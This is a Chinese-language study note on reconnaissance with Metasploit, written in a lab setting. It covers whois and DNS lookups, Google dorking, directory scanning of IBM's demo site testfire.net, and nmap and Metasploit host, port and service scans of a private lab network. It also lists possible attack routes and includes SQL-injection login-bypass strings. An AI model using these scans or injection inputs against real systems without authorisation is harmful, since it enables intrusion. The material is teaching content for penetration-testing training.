《Metasploit 魔鬼训练营》03 情报搜集技术

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

  1. 外围信息搜集
  2. 主机探测与端口扫描
  3. 服务扫描与查点
  4. 网络漏洞扫描
  5. 渗透测试数据库与共享

###1. testfire.net###

testfire.net 是一个包含很多典型 Web 漏洞的模拟银行网站,是 IBM 为了演示 Appscan 所建立的测试网站

###2. 通过 DNS 和 IP 地址挖掘目标网络信息###

1. whois 域名注册信息查询
	包含域名所有者、服务商、管理员邮件地址、域名注册日期和国过期日期

msf > whois testfire.net
[*] exec: whois testfire.net
   Domain Name: TESTFIRE.NET
   Registry Domain ID: 8363973_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.corporatedomains.com
   Registrar URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
   Updated Date: 2017-07-19T05:16:54Z
   Creation Date: 1999-07-23T13:52:32Z
   Registry Expiry Date: 2018-07-23T13:52:32Z
   Registrar: CSC Corporate Domains, Inc.
   Registrar IANA ID: 299
   Registrar Abuse Contact Email: [email protected]
   Registrar Abuse Contact Phone: 8887802723
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: ASIA3.AKAM.NET
   Name Server: EUR2.AKAM.NET
   Name Server: EUR5.AKAM.NET
   Name Server: NS1-206.AKAM.NET
   Name Server: NS1-99.AKAM.NET
   Name Server: USC2.AKAM.NET
   Name Server: USC3.AKAM.NET
   Name Server: USW2.AKAM.NET
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2017-08-28T07:19:35Z <<<

2. nslookup 域名解析 IP
root@attacker:~# nslookup 
> set type=A		#设置对IP地址进行解析
> testfire.net
Server:		10.10.10.2
Address:	10.10.10.2#53

Non-authoritative answer:
Name:	testfire.net
Address: 65.61.137.117
> exit

root@attacker:~# nslookup 
> set type=MX
> testfire.net
Server:		10.10.10.2
Address:	10.10.10.2#53

Non-authoritative answer:
*** Can't find testfire.net: No answer

Authoritative answers can be found from:
testfire.net
	origin = asia3.akam.net
	mail addr = hostmaster.akamai.com
	serial = 1366025603
	refresh = 43200
	retry = 7200
	expire = 604800
	minimum = 86400	
3. dig 从官方 DNS 服务器上查询到精确的权威解答
root@attacker:~# dig @ns.watson.ibm.com testfire.net
; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 35209
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net.			IN	A

;; Query time: 302 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Mon Aug 28 03:32:52 EDT 2017
;; MSG SIZE  rcvd: 41
4. IP2Location  通过 IP 查询地理位置
	查询国外的 IP 地址 https://www.maxmind.com/zh/home 使用其中的 GeoIP
	查询国内的 IP 地址 www.cz88.net
5. netcraft 查询网站的子域名
	http://searchdns.netcraft.com/
	获取网站更为详细的详细 http://toolbar.netcraft.com/site_report
6. IP2Domain 反查域名
	主要查询同一 IP 的不同虚拟主机
	查询国外的 IP 地址 www.ip-address.com/reverse_ip/65.61.137.117
	查询国内的 IP 地址 http://www.7c.com/

###3. 通过搜索引擎进行信息收集###

1. Google Hacking 技术
查看 Google 黑客数据库 https://www.exploit-db.com/google-hacking-database/
自动化工具 Sitedigger 下载链接 https://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
		   Search Diggity 下载链接 
2. 探索网站的目录结构
在 Google 中搜索 “parent directory site:testfire.net” ,结果显示 demo.testfire.net - /bank/
inc文件:网站的配置信息
bak:备份文件
sql或txt:SQL脚本

使用 msf 中的 brute_dirs、dir_listing、dir_scanner等辅助模块也可以完成
以 dir_scanner 为例:
msf > use auxiliary/scanner/http/dir_scanner 
msf auxiliary(dir_scanner) > show options

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                               yes       The target address range or CIDR identifier
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     1                                                        yes       The number of concurrent threads
   VHOST                                                                no        HTTP server virtual host

msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS www.testfire.net
RHOSTS => www.testfire.net
msf auxiliary(dir_scanner) > exploit 
	[*] Detecting error code
	[*] Using code '404' as not found for 65.61.137.117
	[*] Found http://65.61.137.117:80/Admin/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/admin/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/bank/ 200 (65.61.137.117)
	[*] Found http://65.61.137.117:80/images/ 403 (65.61.137.117)
	[*] Found http://65.61.137.117:80/static/ 403 (65.61.137.117)
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
发现了隐藏目录 Admin,因为服务器返回403,表示没有权限,而不是 404 未找到文件
如果在根目录发现 rebot.txt 文件,则应该重视,表示了爬虫在抓取网页时应该遵循的规则
3. 检索天特定类型的文件
	在 Google 中搜索 :site:testfire.net filetype:xls 显示一个文档
		包含了详细的联系人信息
4. 搜索网站中的 E-mail 地址
	使用 msf 的模块: serch_email_clooector	
5. 搜索已存在 SQL 注入的页面 
	在 Google 中搜索 :site:testfire.net inurl:login 得到了后台 URL 
		在用户名输入 “ admin 'OR' 1 ”,即可登录
		在用户名输入 “ test OR 1=1-- ”,任意输入密码,也可登录

###4. 主机探测与端口扫描###

1. ICMP Ping 扫描
	root@attacker:~# ping -c 5 www.dvssc.com
		PING www.dvssc.com (10.10.10.129) 56(84) bytes of data.
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=1 ttl=64 time=0.322 ms
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=2 ttl=64 time=0.211 ms
		64 bytes from www.dvssc.com (10.10.10.129): icmp_seq=3 ttl=64 time=0.247 ms
		--- www.dvssc.com ping statistics ---
		4 packets transmitted, 4 received, 0% packet loss, time 3055ms
		rtt min/avg/max/mdev = 0.211/0.253/0.322/0.045 ms
2. msf 的主机发现模块
路径:/module/auxiliary/scanner/discovery/
主要有以下几个:arp_sweep、empty_udp、ipv6_multicast_ping、ipv6_neighbor、ipv6_neighbor_router_advertisement、udp_probe、udp_sweep
常用的:
	arp_sweep 使用 ARP 请求美剧本地局域网中的所有活跃主机
	udp_sweep 通过发送 UDP 数据包探查制定主机是否活跃,并发现主机上的 UDP 服务 
msf > use auxiliary/scanner/discovery/arp_sweep 
msf auxiliary(arp_sweep) > show options 
Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data
msf auxiliary(arp_sweep) > set RHOSTS 10.10.10.0/24
RHOSTS => 10.10.10.0/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run
[*] 10.10.10.1 appears to be up (VMware, Inc.).
[*] 10.10.10.2 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.129 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] 10.10.10.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
3. 使用 Nmap 进行主机探测
-sn:使用 ICMP 的 Ping 扫描捕获网络中存活的主机
msf > nmap -sn 10.10.10.0/24
	[*] exec: nmap -sn 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:43 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.00026s latency).
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Nmap scan report for 10.10.10.2
	Host is up (0.00048s latency).
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.00019s latency).
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.000076s latency).
	MAC Address: 00:0C:29:19:70:BF (VMware)
	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up.
	Nmap done: 256 IP addresses (5 hosts up) scanned in 2.07 seconds
-Pn:不使用 Ping 扫描	
-PU:通过对开放的 UDP 端口进行探测,默认会列出开放的 TCP 端口,在使用 -sn ,仅探测存活主机,不对开放的 TCP 端口进行扫描
msf > nmap -PU -sn 10.10.10.0/24
	[*] exec: nmap -PU -sn 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:49 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.00025s latency).
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Nmap scan report for 10.10.10.2
	Host is up (0.0013s latency).
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.000073s latency).
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.00017s latency).
	MAC Address: 00:50:56:E7:DA:ED (VMware)
	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up.
	Nmap done: 256 IP addresses (5 hosts up) scanned in 2.00 seconds
4. 操作系统辨识
-O:对目标操作系统进行识别
msf > nmap -O 10.10.10.0/24
	[*] exec: nmap -O 10.10.10.0/24
	Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 21:51 EDT
	Nmap scan report for 10.10.10.1
	Host is up (0.000081s latency).
	Not shown: 987 closed ports
	PORT      STATE SERVICE
	135/tcp   open  msrpc
	139/tcp   open  netbios-ssn
	443/tcp   open  https
	445/tcp   open  microsoft-ds
	902/tcp   open  iss-realsecure
	912/tcp   open  apex-mesh
	6000/tcp  open  X11
	24800/tcp open  unknown
	49152/tcp open  unknown
	49153/tcp open  unknown
	49156/tcp open  unknown
	49161/tcp open  unknown
	49163/tcp open  unknown
	MAC Address: 00:50:56:C0:00:08 (VMware)
	Device type: general purpose
	Running: Microsoft Windows Vista|7|8.1
	OS CPE: cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1
	OS details: Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1
	Network Distance: 1 hop

	Nmap scan report for 10.10.10.2
	Host is up (0.000086s latency).
	All 1000 scanned ports on 10.10.10.2 are closed
	MAC Address: 00:50:56:F1:2E:08 (VMware)
	Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
	Device type: specialized
	Running: VMware Player
	OS CPE: cpe:/a:vmware:player
	OS details: VMware Player virtual NAT device
	Network Distance: 1 hop

	Nmap scan report for www.dvssc.com (10.10.10.129)
	Host is up (0.00022s latency).
	Not shown: 991 closed ports
	PORT     STATE SERVICE
	22/tcp   open  ssh
	80/tcp   open  http
	139/tcp  open  netbios-ssn
	143/tcp  open  imap
	443/tcp  open  https
	445/tcp  open  microsoft-ds
	5001/tcp open  commplex-link
	8080/tcp open  http-proxy
	8081/tcp open  blackice-icecap
	MAC Address: 00:0C:29:21:A3:A6 (VMware)
	Device type: general purpose
	Running: Linux 2.6.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6
	OS details: Linux 2.6.17 - 2.6.36
	Network Distance: 1 hop

	Nmap scan report for gate.dvssc.com (10.10.10.254)
	Host is up (0.00021s latency).
	Not shown: 977 closed ports
	PORT     STATE SERVICE
	21/tcp   open  ftp
	22/tcp   open  ssh
	23/tcp   open  telnet
	25/tcp   open  smtp
	53/tcp   open  domain
	80/tcp   open  http
	111/tcp  open  rpcbind
	139/tcp  open  netbios-ssn
	445/tcp  open  microsoft-ds
	512/tcp  open  exec
	513/tcp  open  login
	514/tcp  open  shell
	1099/tcp open  rmiregistry
	1524/tcp open  ingreslock
	2049/tcp open  nfs
	2121/tcp open  ccproxy-ftp
	3306/tcp open  mysql
	5432/tcp open  postgresql
	5900/tcp open  vnc
	6000/tcp open  X11
	6667/tcp open  irc
	8009/tcp open  ajp13
	8180/tcp open  unknown
	MAC Address: 00:50:56:E7:DA:ED (VMware)
	Device type: general purpose
	Running: Linux 2.6.X
	OS CPE: cpe:/o:linux:linux_kernel:2.6
	OS details: Linux 2.6.9 - 2.6.33
	Network Distance: 1 hop

	Nmap scan report for attacker.dvssc.com (10.10.10.128)
	Host is up (0.000057s latency).
	Not shown: 999 closed ports
	PORT   STATE SERVICE
	22/tcp open  ssh
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.8 - 4.6
	Network Distance: 0 hops

	OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 256 IP addresses (5 hosts up) scanned in 7.17 seconds
5. 端口扫描与服务类型探测
	msf > search portscan
	Matching Modules
	================

	   Name                                              Disclosure Date  Rank    Description
	   ----                                              ---------------  ----    -----------
	   auxiliary/scanner/http/wordpress_pingback_access                   normal  Wordpress Pingback Locator
	   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner
	   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner
	   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner
	   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner
	   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner
	   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner
	   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner

	几款扫描工具: 
		natpmp_portscan         
		ack:通过 ACK 方式对防火墙上未被屏蔽的端口进行探测
		ftpbounce :通过 ftp bounce 攻击的原理对 TCP 服务进行枚举 
		syn:使用发送 TCP SYN 标志的方式探测开放的端口  
		tcp: 通过一次完整的 TCP 连接来判断端口是否开放 
		xmas:通过发送 FIN、PSH、URG 标识,较为隐蔽 

	msf > use auxiliary/scanner/portscan/syn 
	msf auxiliary(syn) > show options 

	Module options (auxiliary/scanner/portscan/syn):

	   Name       Current Setting  Required  Description
	   ----       ---------------  --------  -----------
	   BATCHSIZE  256              yes       The number of hosts to scan per set
	   DELAY      0                yes       The delay between connections, per thread, in milliseconds
	   INTERFACE                   no        The name of the interface
	   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
	   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
	   RHOSTS                      yes       The target address range or CIDR identifier
	   SNAPLEN    65535            yes       The number of bytes to capture
	   THREADS    1                yes       The number of concurrent threads
	   TIMEOUT    500              yes       The reply read timeout in milliseconds

	msf auxiliary(syn) > set RHOSTS 10.10.10.254
	RHOSTS => 10.10.10.254
	msf auxiliary(syn) > set THREADS 20
	THREADS => 20
	msf auxiliary(syn) > run
		[*]  TCP OPEN 10.10.10.254:22
		[*]  TCP OPEN 10.10.10.254:23
		[*]  TCP OPEN 10.10.10.254:53
		[*]  TCP OPEN 10.10.10.254:513
		[*]  TCP OPEN 10.10.10.254:514
		[*]  TCP OPEN 10.10.10.254:1099
6. Nmap 的端口扫描功能
	六个状态:open、closed、filter、unfilter、open|filter、closed|filter
	扫描参数:
		-sT: TCP connect 扫描
		-sS: TCP SYN 扫描
		-sF\-sX\-sN:通过发送一些标志位以避开检测
		-sP:发送 ICMP echo 请求探测主机是否存活,原理同 Ping 
		-sU:探测开放了那些 UDP端口
		-sA:TCP ACK 扫描
		-sV:探测更详细的服务信息
	扫描选项:
	-Pn:扫描之前,不发送 ICMP echo 请求测试目标是否活跃
	-O:指纹特征扫描以获取远程主机的操作系统类型
	-F:快速扫描,只列出 nmap-services 中列出的端口
	-p :制定端口或范围
	
	msf > nmap -sS -Pn 10.10.10.129
		[*] exec: nmap -sS -Pn 10.10.10.129
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 22:45 EDT
		Nmap scan report for www.dvssc.com (10.10.10.129)
		Host is up (0.00010s latency).
		Not shown: 991 closed ports
		PORT     STATE SERVICE
		22/tcp   open  ssh
		80/tcp   open  http
		139/tcp  open  netbios-ssn
		143/tcp  open  imap
		443/tcp  open  https
		445/tcp  open  microsoft-ds
		5001/tcp open  commplex-link
		8080/tcp open  http-proxy
		8081/tcp open  blackice-icecap
		MAC Address: 00:0C:29:21:A3:A6 (VMware)
		Nmap done: 1 IP address (1 host up) scanned in 0.20 second
7. 使用 nmap 探测更详细的服务信息
	msf > nmap -sV -Pn 10.10.10.129
		[*] exec: nmap -sV -Pn 10.10.10.129
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 22:46 EDT
		Nmap scan report for www.dvssc.com (10.10.10.129)
		Host is up (0.000099s latency).
		Not shown: 991 closed ports
		PORT     STATE SERVICE     VERSION
		22/tcp   open  ssh         OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
		80/tcp   open  http        Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
		139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		143/tcp  open  imap        Courier Imapd (released 2008)
		443/tcp  open  ssl/http    Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
		445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		5001/tcp open  java-rmi    Java RMI
		8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
		8081/tcp open  http        Jetty 6.1.25
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port5001-TCP:V=7.40%I=7%D=8/28%Time=59A4D583%P=x86_64-pc-linux-gnu%r(NU
		SF:LL,4,"\xac\xed\0\x05");
		MAC Address: 00:0C:29:21:A3:A6 (VMware)
		Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 13.13 seconds

	msf > nmap -sV -Pn 10.10.10.130
		[*] exec: nmap -sV -Pn 10.10.10.130
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 23:07 EDT
		Nmap scan report for service.dvssc.com (10.10.10.130)
		Host is up (0.00015s latency).
		Not shown: 985 closed ports
		PORT     STATE SERVICE         VERSION
		21/tcp   open  ftp             Microsoft ftpd
		80/tcp   open  http            Microsoft IIS httpd 6.0
		135/tcp  open  msrpc           Microsoft Windows RPC
		139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn
		445/tcp  open  microsoft-ds    Microsoft Windows 2003 or 2008 microsoft-ds
		777/tcp  open  multiling-http?
		1025/tcp open  msrpc           Microsoft Windows RPC
		1026/tcp open  msrpc           Microsoft Windows RPC
		1030/tcp open  msrpc           Microsoft Windows RPC
		1031/tcp open  msrpc           Microsoft Windows RPC
		1521/tcp open  oracle-tns      Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
		6002/tcp open  http            SafeNet Sentinel Protection Server httpd 7.3
		7001/tcp open  afs3-callback?
		7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
		8099/tcp open  http            Microsoft IIS httpd 6.0
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port777-TCP:V=7.40%I=7%D=8/28%Time=59A4DAC1%P=x86_64-pc-linux-gnu%r(Ker
		SF:beros,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(Termin
		SF:alServer,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t
		SF:\xe0\x06");
		MAC Address: 00:0C:29:DB:51:D2 (VMware)
		Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 149.72 seconds

	msf > nmap -sV -Pn 10.10.10.254
		[*] exec: nmap -sV -Pn 10.10.10.254
		Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-28 23:09 EDT
		Nmap scan report for gate.dvssc.com (10.10.10.254)
		Host is up (0.00024s latency).
		Not shown: 977 closed ports
		PORT     STATE SERVICE     VERSION
		21/tcp   open  ftp         vsftpd 2.3.4
		22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
		23/tcp   open  telnet      Linux telnetd
		25/tcp   open  smtp        Postfix smtpd
		53/tcp   open  domain      ISC BIND 9.4.2
		80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
		111/tcp  open  rpcbind     2 (RPC #100000)
		139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
		512/tcp  open  exec        netkit-rsh rexecd
		513/tcp  open  login?
		514/tcp  open  tcpwrapped
		1099/tcp open  rmiregistry GNU Classpath grmiregistry
		1524/tcp open  ingreslock?
		2049/tcp open  nfs         2-4 (RPC #100003)
		2121/tcp open  ftp         ProFTPD 1.3.1
		3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
		5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
		5900/tcp open  vnc         VNC (protocol 3.3)
		6000/tcp open  X11         (access denied)
		6667/tcp open  irc         UnrealIRCd
		8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
		8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
		SF-Port1524-TCP:V=7.40%I=7%D=8/28%Time=59A4DAEE%P=x86_64-pc-linux-gnu%r(NU
		SF:LL,27,"\x1b\[01;31mroot@gate\x1b\[00m:\x1b\[01;34m/\x1b\[00m#\x20")%r(G
		MAC Address: 00:50:56:E7:DA:ED (VMware)
		Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
		Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
		Nmap done: 1 IP address (1 host up) scanned in 162.99 seconds

###5. 探测扫描结果分析###

主机 操作系统 主要的开放端口 对应服务版本
网站服务器(10.10.10.129) Linux SSH (22) OpenSSH 5.3.p1
HTTP(80) Apache httpd 2.2.14
netbios-ssn(139) Samba smbd 3.X - 4.X
imap(143) Courier Imapd (released 2008)
ssl/http(443) Apache httpd 2.2.14
445/tcp open netbios-ssn (445) Samba smbd 3.X - 4.X
java-rmi(5001) Java RMI
ahttp(8080) Apache Tomcat/Coyote JSP engine 1.1
后台服务器(10.10.10.130) Windows ftp(21) Microsoft ftpd
http(80) Microsoft IIS httpd 6.0
msrpc(135) Microsoft Windows RPC
netbios-ssn(139) Microsoft Windows netbios-ssn
microsoft-ds (445) Microsoft Windows 2003 or 2008 microsoft-ds
msrpc (1025) Microsoft Windows RPC
msrpc (1026) Microsoft Windows RPC
msrpc (1030) Microsoft Windows RPC
msrpc (1031) Microsoft Windows RPC
oracle-tns(1521) Oracle TNS Listener 10.2.0.1.0 (for 32-bit Windows)
http(6002) SafeNet Sentinel Protection Server httpd 7.3
http(7002) SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
http(8099) Microsoft IIS httpd 6.0
网关服务器 10.10.10.254 ftp(21) vsftpd 2.3.4
ssh(22) OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
telnet(23) Linux telnetd
smtp(25)
domain(53) ISC BIND 9.4.2
http(80) Apache httpd 2.2.8 ((Ubuntu) DAV/2)
rpcbind(111) 2 (RPC #100000)
netbios-ssn (139) netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
netbios-ssn (445) netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
exec(512) netkit-rsh rexecd
rmiregistry(1099) GNU Classpath grmiregistry
nfs(2049) 2-4 (RPC #100003)
ftp(2121) ProFTPD 1.3.1
mysql(3306) MySQL 5.0.51a-3ubuntu5
postgresql(5432) PostgreSQL DB 8.3.0 - 8.3.7
vnc(5900) VNC (protocol 3.3)
X11(6000) (access denied)
irc(6667) UnrealIRCd
ajp13(8009) Apache Jserv (Protocol v1.3)
http(8180) Apache Tomcat/Coyote JSP engine 1.1

###6. 可能的攻击路线###

可能的攻击路线 攻击对象
口令猜解 10.10.10.129:SSH\Samba
10.10.10.130:SMB
10.10.10.254:FTP、SSH、Telnet、MySQL、PostreSQL
口令嗅探 10.10.10.254:FTP、Telnet
系统漏洞深入扫描 全部存活主机的开放端口
系统漏洞利用 所有开放网络服务中存在的安全漏洞
Web 应用漏洞扫描 10.10.10.129:Apache、Apache Tomcat
10.10.10.254: Apache、Apache Tomcat
Web 应用漏洞利用 10.10.10.129:Apache、Apache Tomcat
10.10.10.254:Apache、Apache Tomcat

###7. 服务扫描与查点###

确定开放端口后,通常会对相应端口上所运行服务的信息进行更深入的挖掘,通常称为网络查点。
msf 中的 Scanner 辅助模块中,有很多服务扫描和查点工具。常以[service_name]_version 和 [service_name]_login
	[service_name]_version:遍历网络中包含了某种服务的主机,并进一步确定服务的版本
	[service_name]_login:可对某种服务进行口令探测

msf > search name:_version
	Matching Modules
	================
	   Name                                                     Disclosure Date  Rank     Description
	   ----                                                     ---------------  ----     -----------
	   auxiliary/fuzzers/ssh/ssh_version_15                                      normal   SSH 1.5 Version Fuzzer
	   auxiliary/fuzzers/ssh/ssh_version_2                                       normal   SSH 2.0 Version Fuzzer
	   auxiliary/fuzzers/ssh/ssh_version_corrupt                                 normal   SSH Version Corruption
	   auxiliary/gather/ibm_sametime_version                    2013-12-27       normal   IBM Lotus Sametime Version Enumeration
	   auxiliary/scanner/db2/db2_version                                         normal   DB2 Probe Utility
	   auxiliary/scanner/ftp/ftp_version                                         normal   FTP Version Scanner
	   auxiliary/scanner/h323/h323_version                                       normal   H.323 Version Scanner
	   auxiliary/scanner/http/coldfusion_version                                 normal   ColdFusion Version Scanner
	   auxiliary/scanner/http/http_version                                       normal   HTTP Version Detection
	   auxiliary/scanner/http/joomla_version                                     normal   Joomla Version Scanner
	   auxiliary/scanner/http/sap_businessobjects_version_enum                   normal   SAP BusinessObjects Version Detection
	   auxiliary/scanner/http/ssl_version                       2014-10-14       normal   HTTP SSL/TLS Version Detection (POODLE scanner)
	   auxiliary/scanner/http/svn_scanner                                        normal   HTTP Subversion Scanner
	   auxiliary/scanner/imap/imap_version                                       normal   IMAP4 Banner Grabber
	   auxiliary/scanner/ipmi/ipmi_version                                       normal   IPMI Information Discovery
	   auxiliary/scanner/lotus/lotus_domino_version                              normal   Lotus Domino Version
	   auxiliary/scanner/mysql/mysql_version                                     normal   MySQL Server Version Enumeration
	   auxiliary/scanner/oracle/tnslsnr_version                 2009-01-07       normal   Oracle TNS Listener Service Version Query
	   auxiliary/scanner/pop3/pop3_version                                       normal   POP3 Banner Grabber
	   auxiliary/scanner/postgres/postgres_version                               normal   PostgreSQL Version Probe
	   auxiliary/scanner/printer/printer_version_info                            normal   Printer Version Information Scanner
	   auxiliary/scanner/sap/sap_mgmt_con_version                                normal   SAP Management Console Version Detection
	   auxiliary/scanner/scada/digi_addp_version                                 normal   Digi ADDP Information Discovery
	   auxiliary/scanner/scada/digi_realport_version                             normal   Digi RealPort Serial Server Version
	   auxiliary/scanner/scada/modbusdetect                     2011-11-01       normal   Modbus Version Scanner
	   auxiliary/scanner/smb/smb_version                                         normal   SMB Version Detection
	   auxiliary/scanner/smtp/smtp_version                                       normal   SMTP Banner Grabber
	   auxiliary/scanner/snmp/aix_version                                        normal   AIX SNMP Scanner Auxiliary Module
	   auxiliary/scanner/ssh/ssh_version                                         normal   SSH Version Scanner
	   auxiliary/scanner/telnet/lantronix_telnet_version                         normal   Lantronix Telnet Service Banner Detection
	   auxiliary/scanner/telnet/telnet_version                                   normal   Telnet Service Banner Detection
	   auxiliary/scanner/vmware/vmauthd_version                                  normal   VMWare Authentication Daemon Version Scanner
	   auxiliary/scanner/vxworks/wdbrpc_version                                  normal   VxWorks WDB Agent Version Scanner
	   exploit/multi/svn/svnserve_date                          2004-05-19       average  Subversion Date Svnserve
	   exploit/windows/browser/crystal_reports_printcontrol     2010-12-14       normal   Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
